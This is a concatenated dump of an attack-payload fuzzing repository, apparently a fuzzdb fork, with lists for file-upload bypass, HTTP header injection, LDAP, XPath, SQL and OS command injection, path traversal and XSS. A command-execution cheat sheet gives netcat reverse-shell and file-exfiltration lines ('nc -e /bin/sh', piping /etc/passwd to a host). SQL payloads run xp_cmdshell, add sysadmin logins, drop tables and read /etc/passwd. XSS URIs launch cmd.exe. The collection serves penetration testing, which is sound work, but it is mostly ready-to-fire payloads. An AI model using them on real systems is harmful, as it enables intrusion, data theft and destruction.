{PHPSCRIPT}.php.php.rar 9 | {PHPSCRIPT}.php.rar 10 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/file-ul-filter-bypass.readme: -------------------------------------------------------------------------------- 1 | # File Upload Fuzzfile 1.0 - File Name Filter Bypass 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # see: 4 | # http://cwe.mitre.org/data/definitions/434.html 5 | 6 | # projurl 7 | 8 | # For MIME filter bypass, your shellscript should look like 9 | # ------- 10 | # GIF89aP; 11 | # [shell] 12 | # ------- 13 | # 14 | # Check to see if there are no extension checks at all 15 | # 16 | # Check to see if the file upload protection is client side only. 17 | # 18 | # For mod_cgi Server Side Include upload attacks: 19 | # 20 | # 21 | #or, on Windows 22 | # 23 | # 24 | # 25 | # Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so, 26 | # try setting .jpg to executable. If you can set the target directory, try fuzz the 27 | # list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile. 28 | # 29 | # example .htaccess that sets mime type .jpg to be executable: 30 | # ----- 31 | # AddType application/x-httpd-php .jpg 32 | # ----- 33 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/invalid-filenames-linux.txt: -------------------------------------------------------------------------------- 1 | # Invalid filenames - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 2 | 3 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/invalid-filenames-microsoft.txt: -------------------------------------------------------------------------------- 1 | # Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files 2 | # regex replace {EXT} with allowed extension type 3 | CON.{EXT} 4 | PRN.{EXT} 5 | AUX.{EXT} 6 | CLOCK$.{EXT} 7 | NUL.{EXT} 8 | COM1.{EXT} 9 | COM2.{EXT} 10 | COM3.{EXT} 11 | COM4.{EXT} 12 | COM5.{EXT} 13 | COM6.{EXT} 14 | COM7.{EXT} 15 | COM8.{EXT} 16 | COM9.{EXT} 17 | LPT1.{EXT} 18 | LPT2.{EXT} 19 | LPT3.{EXT} 20 | LPT4.{EXT} 21 | LPT5.{EXT} 22 | LPT6.{EXT} 23 | LPT7.{EXT} 24 | LPT8.{EXT} 25 | LPT9.{EXT} 26 | *.{EXT} 27 | ".{EXT} 28 | [.{EXT} 29 | ].{EXT} 30 | :.{EXT} 31 | |.{EXT} 32 | =.{EXT} 33 | ,.{EXT} 34 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/invalid-filesystem-chars-microsoft.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 2 | # fuzz these into a filename during upload attempts 3 | * 4 | . 5 | " 6 | / 7 | \ 8 | [ 9 | ] 10 | : 11 | ; 12 | | 13 | = 14 | , 15 | -------------------------------------------------------------------------------- /attack-payloads/file-upload/invalid-filesystem-chars-osx.txt: -------------------------------------------------------------------------------- 1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. 2 | # fuzz these into a filename during upload attempts 3 | : 4 | -------------------------------------------------------------------------------- /attack-payloads/html_fuzz/javascript_events.txt: -------------------------------------------------------------------------------- 1 | onafterprint 2 | onbeforeprint 3 | onbeforeonload 4 | onblur 5 | onerror 6 | onfocus 7 | onhaschange 8 | onload 9 | onmessage 10 | onoffline 11 | ononline 12 | onpagehide 13 | onpageshow 14 | onpopstate 15 | onredo 16 | onresize 17 | onstorage 18 | onundo 19 | onunload 20 | onblur 21 | onchange 22 | oncontextmenu 23 | onfocus 24 | onformchange 25 | onforminput 26 | oninput 27 | oninvalid 28 | onreset 29 | onselect 30 | onsubmit 31 | onkeydown 32 | onkeypress 33 | onkeyup 34 | onclick 35 | ondblclick 36 | ondrag 37 | ondragend 38 | ondragenter 39 | ondragleave 40 | ondragover 41 | ondragstart 42 | ondrop 43 | onmousedown 44 | onmousemove 45 | onmouseout 46 | onmouseover 47 | onmouseup 48 | onmousewheel 49 | onscroll 50 | onabort 51 | oncanplay 52 | oncanplaythrough 53 | ondurationchange 54 | onemptied 55 | onended 56 | onerror 57 | onloadeddata 58 | onloadedmetadata 59 | onloadedstart 60 | onpause 61 | onplay 62 | onplaying 63 | onprogress 64 | onratechange 65 | onreadystatechange 66 | onseeked 67 | onseeking 68 | onstalled 69 | onsuspend 70 | ontimeupdate 71 | onvolumechange 72 | onwaiting 73 | style 74 | 75 | -------------------------------------------------------------------------------- /attack-payloads/http-protocol/crlf-notes.txt: -------------------------------------------------------------------------------- 1 | References: 2 | 3 | http://ha.ckers.org/response-splitting.html 4 | 5 | -------------------------------------------------------------------------------- /attack-payloads/http-protocol/docs.http-method-defs.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/http-protocol/docs.http-method-defs.html -------------------------------------------------------------------------------- /attack-payloads/http-protocol/hpp.fuzz.txt: -------------------------------------------------------------------------------- 1 | # HTTP paramter polution and interpretation payloads by Jacco van Tuijl 2 | ?id=id=1 3 | &id=1?id=2 4 | ?id['&id=1']=2 5 | ?id[1&id=2]=1 6 | ?id=1&id=2 7 | &id=1&id=2 8 | ?id=1%26id%3D2 9 | ?id&id=1 10 | ????id=1 11 | &&&&id=1 12 | ?id=id['1']=2 13 | ?id=1#id=2 14 | ?id==1 15 | ?id===1 16 | ;id=1?id=2 17 | ?id;id=1 18 | &id=1;id=2 19 | #id=1?id=2&id=3 20 | ?id=1,2 21 | ?id1,id2=1 22 | ?id[=1&id=2]=3 23 | ?id[&id=2]=1 24 | ?id=[1,2] 25 | ?id&=1 26 | ?id[]=1&id=2 27 | ?id=/:@&=+$&id=2 28 | ?id[=/:@&=+$&id=2]=1 29 | ?id={id:{id:1},2} 30 | ?id[{id:{id[]:1},2}]=3 31 | ?id=%23?id=1 32 | ?id=1%26id=2 33 | ?id=1%2526id=2 34 | ?id=1%c0%a6id=2 35 | ?id=1\uc0a6id=2 36 | ?id=1&id=2 37 | ?id=1&id=2 38 | ?id=1%u0026;id=2 -------------------------------------------------------------------------------- /attack-payloads/http-protocol/http-header-cache-poison.txt: -------------------------------------------------------------------------------- 1 | # Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010) 2 | # creative commons license http://creativecommons.org/licenses/by/3.0/ 3 | # projurl 4 | GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1 5 | %0d%0aX-Injection-Header:%20AttackValue 6 | -------------------------------------------------------------------------------- /attack-payloads/http-protocol/http-protocol-methods.txt: -------------------------------------------------------------------------------- 1 | OPTIONS 2 | GET 3 | HEAD 4 | POST 5 | PUT 6 | DELETE 7 | TRACE 8 | CONNECT 9 | PROPFIND 10 | PROPPATCH 11 | MKCOL 12 | COPY 13 | MOVE 14 | LOCK 15 | UNLOCK 16 | VERSION-CONTROL 17 | REPORT 18 | CHECKOUT 19 | CHECKIN 20 | UNCHECKOUT 21 | MKWORKSPACE 22 | UPDATE 23 | LABEL 24 | MERGE 25 | BASELINE-CONTROL 26 | MKACTIVITY 27 | ORDERPATCH 28 | ACL 29 | PATCH 30 | SEARCH 31 | ARBITRARY 32 | BCOPY 33 | BDELETE 34 | BMOVE 35 | BPROPFIND 36 | BPROPPATCH 37 | DEBUG 38 | INDEX 39 | NOTIFY 40 | POLL 41 | RPC_IN_DATA 42 | RPC_OUT_DATA 43 | SUBSCRIBE 44 | UNSUBSCRIBE 45 | X-MS-ENUMATTS -------------------------------------------------------------------------------- /attack-payloads/http-protocol/http-request-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Accept 2 | Accept-Charset 3 | Accept-Encoding 4 | Accept-Language 5 | Accept-Datetime 6 | Authorization 7 | Cache-Control 8 | Connection 9 | Cookie 10 | Content-Length 11 | Content-MD5 12 | Content-Type 13 | Date 14 | Expect 15 | From 16 | Host 17 | If-Match 18 | If-Modified-Since 19 | If-None-Match 20 | If-Range 21 | If-Unmodified-Since 22 | Max-Forwards 23 | Origin 24 | Pragma 25 | Proxy-Authorization 26 | Range 27 | Referer 28 | TE 29 | User-Agent 30 | Upgrade 31 | Via 32 | Warning 33 | X-Requested-With 34 | DNT 35 | X-Forwarded-For 36 | X-Forwarded-Host 37 | X-Forwarded-Proto 38 | Front-End-Https 39 | X-Http-Method-Override 40 | X-ATT-DeviceId 41 | X-Wap-Profile 42 | Proxy-Connection -------------------------------------------------------------------------------- /attack-payloads/http-protocol/http-response-header-field-names.txt: -------------------------------------------------------------------------------- 1 | Access-Control-Allow-Origin 2 | Accept-Ranges 3 | Age 4 | Allow 5 | Cache-Control 6 | Connection 7 | Content-Encoding 8 | Content-Language 9 | Content-Length 10 | Content-Location 11 | Content-MD5 12 | Content-Disposition 13 | Content-Range 14 | Content-Type 15 | Date 16 | ETag 17 | Expires 18 | Last-Modified 19 | Link 20 | Location 21 | P3P 22 | Pragma 23 | Proxy-Authenticate 24 | Refresh 25 | Retry-After 26 | Server 27 | Set-Cookie 28 | Status 29 | Strict-Transport-Security 30 | Trailer 31 | Transfer-Encoding 32 | Upgrade 33 | Vary 34 | Via 35 | Warning 36 | WWW-Authenticate 37 | X-Frame-Options 38 | Public-Key-Pins 39 | X-XSS-Protection 40 | Content-Security-Policy 41 | X-Content-Security-Policy 42 | X-WebKit-CSP 43 | X-Content-Type-Options 44 | X-Powered-By 45 | X-UA-Compatible -------------------------------------------------------------------------------- /attack-payloads/integer-overflow/integer-overflows.txt: -------------------------------------------------------------------------------- 1 | # integer overflows from jbrofuzz 2 | -1 3 | 0 4 | 0x100 5 | 0x1000 6 | 0x3fffffff 7 | 0x7ffffffe 8 | 0x7fffffff 9 | 0x80000000 10 | 0xfffffffe 11 | 0xffffffff 12 | 0x10000 13 | 0x100000 14 | -------------------------------------------------------------------------------- /attack-payloads/ldap/ldap-injection.fuzz.txt: -------------------------------------------------------------------------------- 1 | ! 2 | %21 3 | %26 4 | %28 5 | %29 6 | %2A%28%7C%28mail%3D%2A%29%29 7 | %2A%28%7C%28objectclass%3D%2A%29%29 8 | %2A%7C 9 | %7C 10 | & 11 | ( 12 | ) 13 | *(|(mail=*)) 14 | *(|(objectclass=*)) 15 | */* 16 | *| 17 | / 18 | // 19 | //* 20 | @* 21 | x' or name()='username' or 'x'='y 22 | | 23 | *()|&' 24 | admin* 25 | admin*)((|userpassword=*) 26 | *)(uid=*))(|(uid=* 27 | *()|%26' -------------------------------------------------------------------------------- /attack-payloads/ldap/ldap.readme.txt: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/ldap-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /attack-payloads/lfi/common-unix-httpd-log-locations.txt: -------------------------------------------------------------------------------- 1 | # based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf 2 | /apache/logs/error.log 3 | /apache/logs/access.log 4 | /apache/logs/error.log 5 | /apache/logs/access.log 6 | /apache/logs/error.log 7 | /apache/logs/access.log 8 | /etc/httpd/logs/acces_log 9 | /etc/httpd/logs/acces.log 10 | /etc/httpd/logs/error_log 11 | /etc/httpd/logs/error.log 12 | /var/www/logs/access_log 13 | /var/www/logs/access.log 14 | /usr/local/apache/logs/access_log 15 | /usr/local/apache/logs/access.log 16 | /var/log/apache/access_log 17 | /var/log/apache2/access_log 18 | /var/log/apache/access.log 19 | /var/log/apache2/access.log 20 | /var/log/access_log 21 | /var/log/access.log 22 | /var/www/logs/error_log 23 | /var/www/logs/error.log 24 | /usr/local/apache/logs/error_log 25 | /usr/local/apache/logs/error.log 26 | /var/log/apache/error_log 27 | /var/log/apache2/error_log 28 | /var/log/apache/error.log 29 | /var/log/apache2/error.log 30 | /var/log/error_log 31 | /var/log/error.log 32 | -------------------------------------------------------------------------------- /attack-payloads/lfi/common-windows-files.txt: -------------------------------------------------------------------------------- 1 | \boot.ini 2 | \WINDOWS\win.ini 3 | \WINNT\win.ini 4 | \WINDOWS\Repair\SAM 5 | \WINDOWS\php.ini 6 | \WINDOWS\system32\drivers\etc\hosts 7 | \WINNT\php.ini 8 | \php\php.ini 9 | \php5\php.ini 10 | \php4\php.ini 11 | \apache\php\php.ini 12 | \xampp\apache\bin\php.ini 13 | \home2\bin\stable\apache\php.ini 14 | \home\bin\stable\apache\php.ini 15 | \Program Files\Apache Group\Apache\logs\access.log 16 | \Program Files\Apache Group\Apache\logs\error.log 17 | \Program Files\Apache Group\Apache\conf\httpd.conf 18 | \Program Files\Apache Group\Apache2\conf\httpd.conf 19 | \Program Files\xampp\apache\conf\httpd.conf 20 | \Program Files\FileZilla Server\FileZilla Server.xml 21 | \Program Files (x86)\Apache Group\Apache\logs\access.log 22 | \Program Files (x86)\Apache Group\Apache\logs\error.log 23 | \Program Files (x86)\Apache Group\Apache\conf\httpd.conf 24 | \Program Files (x86)\Apache Group\Apache2\conf\httpd.conf 25 | \Program Files (x86)\xampp\apache\conf\httpd.conf 26 | \Program Files (x86)\FileZilla Server\FileZilla Server.xml 27 | \AppServ\MySQL\data\mysql\user.MYD -------------------------------------------------------------------------------- /attack-payloads/lfi/readme.txt: -------------------------------------------------------------------------------- 1 | other tools: 2 | 3 | fimap http://code.google.com/p/fimap/ 4 | -------------------------------------------------------------------------------- /attack-payloads/os-cmd-execution/OSCommandInject.Windows.fuzz.txt: -------------------------------------------------------------------------------- 1 | +|+Dir+c:\ 2 | $+|+Dir+c:\ 3 | %26%26+|+dir c:\ 4 | $%26%26dir c:\ 5 | %0a+dir+c:\ 6 | +|+Dir+c:%255c 7 | $+|+Dir+c:%255c 8 | %26%26+|+dir c:%255c 9 | $%26%26dir+c:%255c 10 | %0a+dir+c:%255c 11 | +|+Dir+c:%2f 12 | $+|+Dir+c:%2f 13 | %26%26+|+dir c:%2f 14 | $%26%26dir+c:%2f 15 | %0a+dir+c:%2f 16 | +dir+c:\+| 17 | +|+dir+c:\+| 18 | +|+dir+c:%2f+| 19 | dir+c:\ 20 | ||+dir|c:\ 21 | -------------------------------------------------------------------------------- /attack-payloads/os-cmd-execution/commands-unix.txt: -------------------------------------------------------------------------------- 1 | # list of potentially useful unix commands to fuzz inside an os command execution bug 2 | uname -n -s 3 | whoami 4 | pwd 5 | last 6 | cat /etc/passwd 7 | ls -la /tmp 8 | ls -la /home 9 | ping -i 30 127.0.0.1 10 | ping 127.0.0.1 11 | ping -n 30 12 | -------------------------------------------------------------------------------- /attack-payloads/os-cmd-execution/commands-windows.txt: -------------------------------------------------------------------------------- 1 | # list of potentially useful dos commands to fuzz inside an os command execution bug 2 | ver 3 | chdir 4 | echo %USERNAME% 5 | -------------------------------------------------------------------------------- /attack-payloads/os-cmd-execution/docs/command-execution-cheatsheat-unix.txt: -------------------------------------------------------------------------------- 1 | Executing Commands 2 | 3 | Seperating Commands: 4 | blah;blah2 5 | 6 | PIPEZ: 7 | blah ^ blah2 8 | 9 | AND: 10 | blah && blah2 11 | 12 | OR: 13 | FAIL || X 14 | 15 | OR: 16 | blah%0Dblah2%0Dblah3 17 | 18 | Backtick: 19 | `blah` 20 | 21 | Background: 22 | `blah & blah2` 23 | 24 | 25 | 26 | Getting Files / Data 27 | 28 | FTP: 29 | Make a new text, and echo and then redirect to FTP 30 | 31 | NC: 32 | nc -e /bin/sh 33 | 34 | NC: 35 | echo /etc/passwd | nc host port 36 | 37 | TFTP: 38 | echo put /etc/passwd | tftp host 39 | 40 | WGET: 41 | wget --post-file /etc/passwd 42 | -------------------------------------------------------------------------------- /attack-payloads/os-cmd-execution/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | # single directory traversals that have caused showcode or command exec issues in the past 2 | # GET /path/*payload*relative/path/to/target/file/ 3 | ..%255c 4 | .%5c../..%5c 5 | /..%c0%9v../ 6 | /..%c0%af../ 7 | /..%255c..%255c 8 | 9 | -------------------------------------------------------------------------------- /attack-payloads/os-dir-indexing/directory-indexing.txt: -------------------------------------------------------------------------------- 1 | ;dir 2 | `dir` 3 | |dir| 4 | |dir 5 | /%3f.jsp 6 | ?M=D 7 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 8 | -------------------------------------------------------------------------------- /attack-payloads/path-traversal/path-traversal-windows.txt: -------------------------------------------------------------------------------- 1 | C:/inetpub/wwwroot/global.asa 2 | C:\inetpub\wwwroot\global.asa 3 | C:/boot.ini 4 | C:\boot.ini 5 | D:\inetpub\wwwroot\global.asa 6 | D:/inetpub/wwwroot/global.asa 7 | -------------------------------------------------------------------------------- /attack-payloads/rfi/readme.txt: -------------------------------------------------------------------------------- 1 | Other tools: 2 | 3 | fimap http://code.google.com/p/fimap/ 4 | -------------------------------------------------------------------------------- /attack-payloads/server-side-include/server-side-includes-generic.txt: -------------------------------------------------------------------------------- 1 | # includes work by Foobar@email.de 2 |
3 |
4 |
5 |
6 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/detect/MSSQL.fuzz.txt: -------------------------------------------------------------------------------- 1 | # you will need to customize/modify some of the vaules in the queries for best effect 2 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 3 | 'create user name identified by 'pass123' -- 4 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 5 | ' ; drop table temp -- 6 | 'exec sp_addlogin 'name' , 'password' -- 7 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 8 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 9 | ' grant connect to name; grant resource to name; -- 10 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 11 | ' or 1=1 -- 12 | ' union (select @@version) -- 13 | ' union (select NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 17 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 18 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/detect/MSSQL_blind.fuzz.txt: -------------------------------------------------------------------------------- 1 | # contains statements from jbrofuzz (13 April 2010) 2 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 5 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 6 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 7 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 9 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 10 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/detect/MySQL.fuzz.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/detect/MySQL_MSSQL.fuzz.txt: -------------------------------------------------------------------------------- 1 | # Contains statements from jbrofuzz (13 April 2010) 2 | 1 3 | 1 and user_name() = 'dbo' 4 | \'; desc users; -- 5 | 1\'1 6 | 1' and non_existant_table = '1 7 | ' or username is not NULL or username = ' 8 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 9 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 10 | 1 uni/**/on select all from where 11 | 12 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/detect/docs/docs.oracle_cheat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/sql-injection/detect/docs/docs.oracle_cheat.pdf -------------------------------------------------------------------------------- /attack-payloads/sql-injection/exploit/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/exploit/ms-sql-enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/sql-injection/exploit/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /attack-payloads/sql-injection/exploit/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | # regex replace as many as you can with your fuzzer for best results: 2 | # 3 | # also try to brute force a list of possible usernames, including possile admin acct names 4 | ' OR 1=1-- 5 | 'OR '' = ' Allows authentication without a valid username. 6 | '-- 7 | ' union select 1, '', '' 1-- 8 | 'OR 1=1-- 9 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/exploit/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | # mysql local file disclosure through sqli 2 | # fuzz interesting absolute filepath/filename into 3 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 4 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/exploit/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | # info disclosure payload fuzzfile for pgsql 2 | select version(); 3 | select current_database(); 4 | select current_user; 5 | select session_user; 6 | select current_setting('log_connections'); 7 | select current_setting('log_statement'); 8 | select current_setting('port'); 9 | select current_setting('password_encryption'); 10 | select current_setting('krb_server_keyfile'); 11 | select current_setting('virtual_host'); 12 | select current_setting('port'); 13 | select current_setting('config_file'); 14 | select current_setting('hba_file'); 15 | select current_setting('data_directory'); 16 | select * from pg_shadow; 17 | select * from pg_group; 18 | create table myfile (input TEXT); 19 | copy myfile from '/etc/passwd'; 20 | select * from myfile;copy myfile to /tmp/test; 21 | -------------------------------------------------------------------------------- /attack-payloads/sql-injection/payloads-sql-blind/readme.txt: -------------------------------------------------------------------------------- 1 | credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/ 2 | -------------------------------------------------------------------------------- /attack-payloads/xpath/xpath-injection.fuzz.txt: -------------------------------------------------------------------------------- 1 | ' or '1'='1 2 | ' or ''=' 3 | x' or 1=1 or 'x'='y 4 | / 5 | // 6 | //* 7 | */* 8 | @* 9 | count(/child::node()) 10 | x' or name()='username' or 'x'='y 11 | ' and count(/*)=1 and '1'='1 12 | ' and count(/@*)=1 and '1'='1 13 | ' and count(/comment())=1 and '1'='1 -------------------------------------------------------------------------------- /attack-payloads/xpath/xpath.readme.txt: -------------------------------------------------------------------------------- 1 | tool: 2 | http://code.google.com/p/xpath-blind-explorer/ 3 | 4 | video: 5 | http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ 6 | 7 | -------------------------------------------------------------------------------- /attack-payloads/xss/all-encodings-of-lt.fuzz.txt: -------------------------------------------------------------------------------- 1 | < 2 | %3C 3 | < 4 | < 5 | < 6 | < 7 | < 8 | < 9 | < 10 | < 11 | < 12 | < 13 | < 14 | < 15 | < 16 | < 17 | < 18 | < 19 | < 20 | < 21 | < 22 | < 23 | < 24 | < 25 | < 26 | < 27 | < 28 | < 29 | < 30 | < 31 | < 32 | < 33 | < 34 | < 35 | < 36 | < 37 | < 38 | < 39 | < 40 | < 41 | < 42 | < 43 | < 44 | < 45 | < 46 | < 47 | < 48 | < 49 | < 50 | < 51 | < 52 | < 53 | < 54 | < 55 | < 56 | < 57 | < 58 | < 59 | < 60 | < 61 | < 62 | < 63 | < 64 | < 65 | < 66 | < 67 | \x3c 68 | \x3C 69 | \u003c 70 | \u003C 71 | -------------------------------------------------------------------------------- /attack-payloads/xss/default-javascript-event-attributes.fuzz.txt: -------------------------------------------------------------------------------- 1 | # nice ref: http://projects.webappsec.org/w/page/13246958/Script%20Mapping 2 | onAbort 3 | onBlur 4 | onChange 5 | onClick 6 | onDblClick 7 | onDragDrop 8 | onError 9 | onFocus 10 | onKeyDown 11 | onKeyPress 12 | onKeyUp 13 | onLoad 14 | onMouseDown 15 | onMouseMove 16 | onMouseOut 17 | onMouseOver 18 | onMouseUp 19 | onMove 20 | onReset 21 | onResize 22 | onSelect 23 | onSubmit 24 | -------------------------------------------------------------------------------- /attack-payloads/xss/docs.wasc-scriptmapping/images/ff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/xss/docs.wasc-scriptmapping/images/ff2.png -------------------------------------------------------------------------------- /attack-payloads/xss/docs.wasc-scriptmapping/images/ie7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/xss/docs.wasc-scriptmapping/images/ie7.png -------------------------------------------------------------------------------- /attack-payloads/xss/docs.wasc-scriptmapping/images/safari3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/infosec-au/fuzzdb/1da7931d2b395c704df4ff154ba974e3496665cc/attack-payloads/xss/docs.wasc-scriptmapping/images/safari3.png -------------------------------------------------------------------------------- /attack-payloads/xss/xss-other.txt: -------------------------------------------------------------------------------- 1 | <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> -------------------------------------------------------------------------------- /attack-payloads/xss/xss-uri.txt: -------------------------------------------------------------------------------- 1 | # Contains statements from jbrofuzz (13 April 2010) 2 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 3 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 4 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 5 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 6 | 7 | -------------------------------------------------------------------------------- /discovery/FilenameBruteforce/Extensions.Backup.fuzz.txt: -------------------------------------------------------------------------------- 1 | backup 2 | bck 3 | old 4 | save 5 | bak 6 | sav 7 | ~ 8 | copy 9 | old 10 | orig 11 | tmp 12 | txt 13 | back 14 | -------------------------------------------------------------------------------- /discovery/FilenameBruteforce/Extensions.Mostcommon.fuzz.txt: -------------------------------------------------------------------------------- 1 | asp 2 | aspx 3 | php 4 | php3 5 | php4 6 | php5 7 | txt 8 | shtm 9 | shtml 10 | phtm 11 | phtml 12 | jhtml 13 | pl 14 | jsp 15 | cfm 16 | cfml 17 | py 18 | rb 19 | cfg 20 | zip 21 | pdf 22 | gz 23 | tar 24 | tar.gz 25 | tgz 26 | doc 27 | docx 28 | xls 29 | xlsx 30 | conf 31 | -------------------------------------------------------------------------------- /discovery/FilenameBruteforce/Extensions.Skipfish.fuzz.txt: -------------------------------------------------------------------------------- 1 | 7z 2 | asmx 3 | asp 4 | aspx 5 | bak 6 | bat 7 | bin 8 | bz2 9 | c 10 | cc 11 | cfg 12 | cfm 13 | cgi 14 | class 15 | cnf 16 | conf 17 | config 18 | cpp 19 | cs 20 | csv 21 | dat 22 | db 23 | dll 24 | do 25 | doc 26 | dump 27 | ep 28 | err 29 | error 30 | exe 31 | gif 32 | gz 33 | htm 34 | html 35 | inc 36 | ini 37 | java 38 | jhtml 39 | jpg 40 | js 41 | jsf 42 | jsp 43 | key 44 | lib 45 | log 46 | lst 47 | manifest 48 | mdb 49 | meta 50 | msg 51 | nsf 52 | o 53 | old 54 | ora 55 | orig 56 | out 57 | part 58 | pdf 59 | php 60 | php3 61 | phtml 62 | pl 63 | pm 64 | png 65 | ppt 66 | properties 67 | py 68 | rar 69 | rss 70 | rtf 71 | save 72 | sh 73 | shtml 74 | so 75 | sql 76 | stackdump 77 | swf 78 | tar 79 | tar.bz2 80 | tar.gz 81 | temp 82 | test 83 | tgz 84 | tmp 85 | trace 86 | txt 87 | vb 88 | vbs 89 | ws 90 | xls 